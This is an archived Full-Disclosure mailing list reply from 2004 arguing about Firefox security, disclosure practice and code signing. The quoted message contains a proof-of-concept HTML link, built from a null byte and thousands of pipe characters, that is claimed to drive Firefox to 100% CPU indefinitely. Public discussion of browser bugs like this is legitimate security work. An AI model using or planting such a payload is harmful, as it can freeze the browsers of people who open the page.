lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <41C1A403.4060403@easynix.net>
From: devis at easynix.net (devis)
Subject: To anybody who's offended by my disclosure
	policy-GET THIS GUYS

Rafel Ivgi, The-Insider wrote:

>SkyLined is a great dude. Scerious guy!
>He is only worthy for RESPECT and no blame.
>There is no signed law against releasing such information and its funny
>someone is anyhow talking about this in
>FULL-DISCLOSURE list, which its entire concept is to disclose full details
>about vulnerabilities.
>
>By the way, for all of FireFox fans....FireFox has many open vulnerabilities
>which its vendor refuses to fix. Even after notifing
>and even after 4 month :-)...Moreover, they are just like MS claiming
>certain bugs are not bugs, talking "in the air" and without checking
>and under-blowing risk values. They even don't sign their exe's(which is a
>super minimal protection against man-in-the-middle replacing downloads) so
>microsoft windows can't say its a valid file from a valid vendor and not a
>virus.
>
>For Example:
><a
>href='http://theinsider.deep-ice.com/ctfmon.exe%00/hehe.exe.||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||
>'>test it</a>
>
>This has no effect on I.E......
>Will cause LooserFox, ahh sorry, FireFox to ***BURN ALL YOU CPU!!! 100%
>FOREVER...***
>What i am saying is, it is now who codes the software, it is how you do.
>(if i was not in a job working frame, i would publishing things that will
>cause you all to say its shit)
>FireFox team claimed its an old bug.bla bla bla.and has no problem and no
>security risk...bla bla bla... and didn't fix it after 4 month...
>Just like MS when they are not even commercial, than what they are? on the
>way to making money...to be the second size'd market share browser.
>
>GO SKYLINED!
>
>Rafel Ivgi, The-Insider
>Security Consultant
>Malicious Code Research Center (MCRC)
>Finjan Software LTD
>E-mail: rivgi@...jan.com
>---------------------------------
>Prevention is the best cure!
>----- Original Message ----- 
>From: "ph0enix" <ph0enix@...enix.org>
>To: "'Gadi Evron'" <ge@...uxbox.org>
>Cc: "'Berend-Jan Wever'" <skylined@...p.tudelft.nl>;
><full-disclosure@...ts.netsys.com>
>Sent: Saturday, November 27, 2004 5:56 PM
>Subject: Re: [Full-Disclosure] To anybody who's offended by my disclosure
>policy
>  
>

No software is immune from bugs. Explain exactly what point you are 
trying to prove here ? 4 month old bug ? Not being fixed ? Considering 
the age of code, how many bugs have been fixed, how fast they have done 
it, and how many spyware actually take advantage of the brillant bug you 
are posting ( known for ages....use bugzilla, and with no danger of 
remote code execution, just crash ), i think the track record of Firefox 
is quite exemplary. Please mention another popular browser with such 
track history....I let you search for a while.

Nobody said Firefox was immune from bugs, and your trolling doesn't 
reach far i am afraid. BTW whats the correlation with Skylined way of 
releasing security advisories ? Claiming the code base is 'shit' with 
'if's' is once again defined as trolling in my world. So get real, the 
point is:
- Despite having ( like all software ) some bugs, Firefox is WAYS WAYS 
WAYS safer than anything else on Bill Platform. No its is not a magic 
lock of ur MS box, and it may be owned by many other ways. Nobody said 
install firefox and relax, but its already a step forward compare to 
daily malware removal. More CPU needed ? sure, lets integrate it in 
Windows ala iexplore.exe ....

Finally to crush ur trolling, just do you understand what is a Digitally 
Signed MS app ? It is a lump of money you pay after forwarding your app 
to MS, and they will happily give u a receipt for your dollars stating 
that this app, on a stock XP install, will not crash your box. NOTHING 
MORE. As soon as you are out of the Stock Install, no more warranty are 
given. Basically its hype again, it does not possess nothing more than 
non digitally signed code. It is designed to have fools like you 
thinking they got something for their money. So with that light, i bet 
you can start to imagine why Firefox doesn't pay MS to digitally sign 
it, even so i bet MS will refuse it.
And you are right, one day AV solutions will exclusively be based on 
digital signatures ( *EEEK* ) and soon:

"Norton 2010 has detected a virus on your system:  Firefox.win32"


Finjan ??? Sounds like someone at Redmond...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ